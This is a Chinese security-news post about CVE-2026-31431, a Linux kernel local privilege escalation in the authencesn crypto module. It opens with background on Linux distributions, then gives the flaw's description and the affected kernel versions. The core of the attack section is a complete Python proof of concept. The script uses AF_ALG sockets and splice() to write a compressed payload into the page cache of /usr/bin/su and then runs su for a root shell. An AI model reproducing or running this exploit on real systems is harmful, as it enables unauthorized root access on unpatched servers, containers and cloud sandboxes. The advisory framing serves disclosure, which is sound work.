
0x00 前言
Linux系统是一种开源的类Unix操作系统内核,由于其强大的可定制性和稳定性,Linux已被广泛应用于服务器、移动设备、物联网设备等多个领域。
Linux系统在发展过程中吸引了全球范围内的开发者,形成了一个强大的社区。它采用了GNU通用公共许可证(GPL),这意味着它是自由开源的,并鼓励用户共享和修改代码。这也导致了许多不同的Linux发行版,如Ubuntu、Fedora、Debian等。
一些知名的Linux发行版本包括:
Ubuntu:由Canonical公司维护,以易用性和用户友好性而闻名。
Debian:以稳定性和自由软件的支持而著称,许多其他发行版基于Debian构建。
RHEL (Red Hat Enterprise Linux):面向企业市场,提供长期支持和专业的技术支持。
CentOS:由Red Hat公司提供支持,注重稳定性和企业应用。
Fedora:由Red Hat公司支持,注重创新和最新的软件。
Arch Linux:以简洁和灵活而著称,面向高级用户。
openSUSE:由openSUSE项目维护,有两个主要版本:Leap(稳定版)和Tumbleweed(滚动更新)。
Gentoo:以源代码为基础,允许用户根据自己的硬件和需求定制系统。
Slackware:是最古老的现代Linux发行版之一,注重简洁和纯净。
Manjaro:基于Arch Linux,提供易用性和用户友好的桌面环境。
Linux Mint:基于Ubuntu和Debian,注重用户友好性和多媒体支持。
Elementary OS:以漂亮的用户界面和直观的设计而著称。
Kali Linux:专注于网络安全和渗透测试,包含许多安全工具。
Alpine Linux:专注于轻量级和安全性,常用于容器化环境。0x01 漏洞描述
漏洞源于Linux内核加密子系统中authencesn模块的一个逻辑缺陷。攻击者通过结合使用AF_ALG套接字和splice()系统调用,能够向系统内任意可读文件(如/usr/bin/su)的内存页缓存(Page Cache)中写入4字节数据。这使得攻击者可以篡改高权限可执行文件在内存中的缓存,从而在执行该文件时获得root权限。
0x02 CVE编号
CVE-2026-31431
0x03 影响版本
主线内核:4.14至6.18.21;
长期支持版(LTS):6.12 全系列、6.6全系列、6.1全系列、5.15全系列、5.10全系列等;
发行版内核:RHEL/CentOS 4.18/5.14、Ubuntu 24.04 LTS及以下、Amazon Linux 2023及以下、SUSE 16及以下等自2017年以来构建且未打补丁的内核;
Kubernetes/容器平台;
云端Notebook/代码沙箱;
PaaS/Serverless执行环境;
堡垒机/跳板机/开发机;0x04 漏洞详情
POC:
https://github.com/theori-io/copy-fail-CVE-2026-31431
#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
try:u.recv(8+t)
except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")0x05 参考链接
https://github.com/theori-io/copy-fail-CVE-2026-31431
https://www.openwall.com/lists/oss-security/2026/04/29/23
推荐阅读:
CVE-2025-32463|Linux sudo 本地提权漏洞(POC)
CVE-2024-1086|Linux内核权限提升漏洞(POC)
CVE-2025-21756|Linux提权漏洞(PoC)
Ps:国内外安全热点分享,欢迎大家分享、转载,请保证文章的完整性。文章中出现敏感信息和侵权内容,请联系作者删除信息。信息安全任重道远,感谢您的支持

!!!